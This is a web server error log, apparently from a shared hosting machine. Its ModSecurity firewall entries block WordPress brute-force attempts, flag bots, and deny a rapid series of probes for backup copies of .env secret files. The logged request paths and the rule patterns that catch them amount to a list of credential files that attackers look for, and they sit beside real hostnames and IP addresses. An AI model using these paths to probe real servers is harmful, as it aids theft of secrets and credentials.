[Tue May 26 17:18:49.956207 2026] [security2:error] [pid 869189:tid 869380] [client 62.244.225.226:62950] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWIodB5TZSn88J_orr9ZAAAADw"]
[Tue May 26 17:18:49.981658 2026] [security2:error] [pid 869189:tid 869310] [remote 160.250.186.220:57992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWIodB5TZSn88J_orr9aAAAA3c"]
[Tue May 26 17:18:50.320778 2026] [security2:error] [pid 869189:tid 869427] [client 193.37.33.142:36437] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 142.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWIotB5TZSn88J_orr9cgAAAGs"]
[Tue May 26 17:18:50.391181 2026] [core:error] [pid 869189:tid 869397] [client 74.7.244.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:18:50.391197 2026] [core:error] [pid 869189:tid 869397] [client 74.7.244.7:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:18:50.391321 2026] [security2:error] [pid 869189:tid 869397] [client 74.7.244.7:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "webmail.kardashevtechnologies.com"] [uri "/___proxy_subdomain_webmail/index.php"] [unique_id "ahWIotB5TZSn88J_orr9eQAAAE0"]
[Tue May 26 17:18:50.391896 2026] [security2:error] [pid 869189:tid 869361] [client 74.7.244.7:39286] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "webmail.kardashevtechnologies.com"] [uri "/___proxy_subdomain_webmail/robots.txt"] [unique_id "ahWIotB5TZSn88J_orr9dwAAKV8"]
[Tue May 26 17:18:50.498766 2026] [autoindex:error] [pid 869189:tid 869383] [client 185.92.25.54:27643] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-admin/js/widgets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:50.800314 2026] [security2:error] [pid 869189:tid 869421] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIotB5TZSn88J_orr9hQAAAGU"]
[Tue May 26 17:18:51.433082 2026] [security2:error] [pid 869189:tid 869374] [client 185.92.25.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIo9B5TZSn88J_orr9mwAAADY"]
[Tue May 26 17:18:51.733675 2026] [security2:error] [pid 869189:tid 869338] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIo9B5TZSn88J_orr9nAAAABI"]
[Tue May 26 17:18:52.693256 2026] [security2:error] [pid 869189:tid 869321] [client 156.59.198.135:10124] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.wrapmachines.com"] [uri "/pdf/pdf/mb-250-augerfiller.pdf"] [unique_id "ahWIpNB5TZSn88J_orr9uwAAAAE"]
[Tue May 26 17:18:52.724435 2026] [autoindex:error] [pid 869189:tid 869441] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/images/media/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:52.852515 2026] [security2:error] [pid 869189:tid 869421] [client 208.84.100.233:31400] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.production.copy"] [unique_id "ahWIpNB5TZSn88J_orr9wgAAAGU"]
[Tue May 26 17:18:52.913220 2026] [autoindex:error] [pid 869189:tid 869358] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:53.301846 2026] [security2:error] [pid 869189:tid 869420] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIpdB5TZSn88J_orr9zAAAAGQ"]
[Tue May 26 17:18:53.857767 2026] [security2:error] [pid 869189:tid 869381] [client 208.84.100.233:20432] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.production.swp"] [unique_id "ahWIpdB5TZSn88J_orr-AgAAAD0"]
[Tue May 26 17:18:53.858657 2026] [security2:error] [pid 869189:tid 869408] [client 208.84.100.233:20422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.production~"] [unique_id "ahWIpdB5TZSn88J_orr-BQAAAFg"]
[Tue May 26 17:18:53.858705 2026] [security2:error] [pid 869189:tid 869323] [client 208.84.100.233:20346] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.local.swp"] [unique_id "ahWIpdB5TZSn88J_orr-AwAAAAM"]
[Tue May 26 17:18:53.859300 2026] [security2:error] [pid 869189:tid 869395] [client 208.84.100.233:20302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.local.bak"] [unique_id "ahWIpdB5TZSn88J_orr9_wAAAEs"]
[Tue May 26 17:18:53.859404 2026] [security2:error] [pid 869189:tid 869419] [client 208.84.100.233:20434] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.production.orig"] [unique_id "ahWIpdB5TZSn88J_orr-BAAAAGM"]
[Tue May 26 17:18:53.979929 2026] [security2:error] [pid 869189:tid 869400] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIpdB5TZSn88J_orr93wAAAFA"]
[Tue May 26 17:18:54.221124 2026] [security2:error] [pid 869189:tid 869445] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIptB5TZSn88J_orr-DAAAAH0"]
[Tue May 26 17:18:54.300351 2026] [security2:error] [pid 869189:tid 869362] [client 208.84.100.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWIpdB5TZSn88J_orr95AAAACo"]
[Tue May 26 17:18:54.314797 2026] [security2:error] [pid 869189:tid 869374] [client 208.84.100.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWIpdB5TZSn88J_orr95QAAADY"]
[Tue May 26 17:18:54.615879 2026] [security2:error] [pid 869189:tid 869401] [client 208.84.100.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWIpdB5TZSn88J_orr-BwAAAFE"]
[Tue May 26 17:18:54.618593 2026] [security2:error] [pid 869189:tid 869412] [client 208.84.100.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWIpdB5TZSn88J_orr-CQAAAFw"]
[Tue May 26 17:18:54.848772 2026] [security2:error] [pid 869189:tid 869335] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIptB5TZSn88J_orr-HAAAAA8"]
[Tue May 26 17:18:54.971011 2026] [security2:error] [pid 869189:tid 869330] [client 223.235.98.214:11143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIptB5TZSn88J_orr-KAAAAAo"]
[Tue May 26 17:18:54.971169 2026] [security2:error] [pid 869189:tid 869330] [client 223.235.98.214:11143] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWIptB5TZSn88J_orr-KAAAAAo"]
[Tue May 26 17:18:55.128950 2026] [security2:error] [pid 869189:tid 869411] [client 203.194.101.7:60298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIptB5TZSn88J_orr-LAAAAFs"]
[Tue May 26 17:18:55.129066 2026] [security2:error] [pid 869189:tid 869411] [client 203.194.101.7:60298] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWIptB5TZSn88J_orr-LAAAAFs"]
[Tue May 26 17:18:55.487189 2026] [autoindex:error] [pid 869189:tid 869410] [client 185.92.25.52:33955] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-admin/css/colors/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:55.662503 2026] [security2:error] [pid 869189:tid 869424] [client 208.84.100.233:20366] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.local.copy"] [unique_id "ahWIp9B5TZSn88J_orr-OAAAAGg"]
[Tue May 26 17:18:55.662503 2026] [security2:error] [pid 869189:tid 869440] [client 208.84.100.233:20370] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.production.bak"] [unique_id "ahWIp9B5TZSn88J_orr-OQAAAHg"]
[Tue May 26 17:18:55.663445 2026] [security2:error] [pid 869189:tid 869327] [client 208.84.100.233:20226] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.old"] [unique_id "ahWIp9B5TZSn88J_orr-QAAAAAc"]
[Tue May 26 17:18:55.663446 2026] [security2:error] [pid 869189:tid 869383] [client 208.84.100.233:20354] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.local.orig"] [unique_id "ahWIp9B5TZSn88J_orr-PAAAAD8"]
[Tue May 26 17:18:55.663453 2026] [security2:error] [pid 869189:tid 869394] [client 208.84.100.233:20258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env~"] [unique_id "ahWIp9B5TZSn88J_orr-PwAAAEo"]
[Tue May 26 17:18:55.664228 2026] [security2:error] [pid 869189:tid 869427] [client 208.84.100.233:20330] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.local~"] [unique_id "ahWIp9B5TZSn88J_orr-PQAAAGs"]
[Tue May 26 17:18:55.664320 2026] [security2:error] [pid 869189:tid 869332] [client 208.84.100.233:20234] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.backup"] [unique_id "ahWIp9B5TZSn88J_orr-QQAAAAw"]
[Tue May 26 17:18:55.664869 2026] [security2:error] [pid 869189:tid 869377] [client 208.84.100.233:20276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.orig"] [unique_id "ahWIp9B5TZSn88J_orr-OgAAADk"]
[Tue May 26 17:18:55.665300 2026] [security2:error] [pid 869189:tid 869388] [client 208.84.100.233:20394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.production.backup"] [unique_id "ahWIp9B5TZSn88J_orr-OwAAAEQ"]
[Tue May 26 17:18:55.665695 2026] [security2:error] [pid 869189:tid 869439] [client 208.84.100.233:20292] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.copy"] [unique_id "ahWIp9B5TZSn88J_orr-RAAAAHc"]
[Tue May 26 17:18:55.665905 2026] [security2:error] [pid 869189:tid 869370] [client 208.84.100.233:20308] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.local.old"] [unique_id "ahWIp9B5TZSn88J_orr-QgAAADI"]
[Tue May 26 17:18:55.666338 2026] [security2:error] [pid 869189:tid 869406] [client 208.84.100.233:20310] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.local.backup"] [unique_id "ahWIp9B5TZSn88J_orr-RQAAAFY"]
[Tue May 26 17:18:55.666496 2026] [security2:error] [pid 869189:tid 869392] [client 208.84.100.233:20380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.production.old"] [unique_id "ahWIp9B5TZSn88J_orr-NwAAAEg"]
[Tue May 26 17:18:55.668893 2026] [security2:error] [pid 869189:tid 869445] [client 208.84.100.233:20266] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.swp"] [unique_id "ahWIp9B5TZSn88J_orr-RwAAAH0"]
[Tue May 26 17:18:55.675893 2026] [security2:error] [pid 869189:tid 869365] [client 208.84.100.233:20222] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/.env.bak"] [unique_id "ahWIp9B5TZSn88J_orr-SwAAAC0"]
[Tue May 26 17:18:55.844249 2026] [security2:error] [pid 869189:tid 869396] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIp9B5TZSn88J_orr-WgAAAEw"]
[Tue May 26 17:18:56.277470 2026] [security2:error] [pid 869189:tid 869321] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWIp9B5TZSn88J_orr-nwAAAAE"]
[Tue May 26 17:18:56.541634 2026] [security2:error] [pid 869189:tid 869345] [client 208.84.100.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWIp9B5TZSn88J_orr-UwAAABk"]
[Tue May 26 17:18:56.552610 2026] [security2:error] [pid 869189:tid 869377] [client 208.84.100.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWIp9B5TZSn88J_orr-RgAAADk"]
[Tue May 26 17:18:56.558833 2026] [security2:error] [pid 869189:tid 869430] [client 208.84.100.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWIp9B5TZSn88J_orr-UAAAAG4"]
[Tue May 26 17:18:56.566001 2026] [security2:error] [pid 869189:tid 869374] [client 208.84.100.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWIp9B5TZSn88J_orr-UgAAADY"]
[Tue May 26 17:18:56.589219 2026] [security2:error] [pid 869189:tid 869352] [client 208.84.100.233:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWIp9B5TZSn88J_orr-VAAAACA"]
[Tue May 26 17:18:56.620231 2026] [autoindex:error] [pid 869189:tid 869359] [client 185.92.25.52:0] AH01276: Cannot serve directory /home2/whitece9/bookmyitem.com/wp-includes/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:18:56.630746 2026] [security2:error] [pid 869189:tid 869325] [client 74.7.244.7:39298] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.adityacreations.co.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWIqNB5TZSn88J_orr-3AAABXw"]
[Tue May 26 17:18:56.927881 2026] [security2:error] [pid 869189:tid 869444] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIqNB5TZSn88J_orr-3wAAAHw"]
[Tue May 26 17:18:57.455080 2026] [security2:error] [pid 869189:tid 869328] [client 185.92.25.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bookmyitem.com"] [uri "/index.php"] [unique_id "ahWIqdB5TZSn88J_orr-6wAAAAg"]
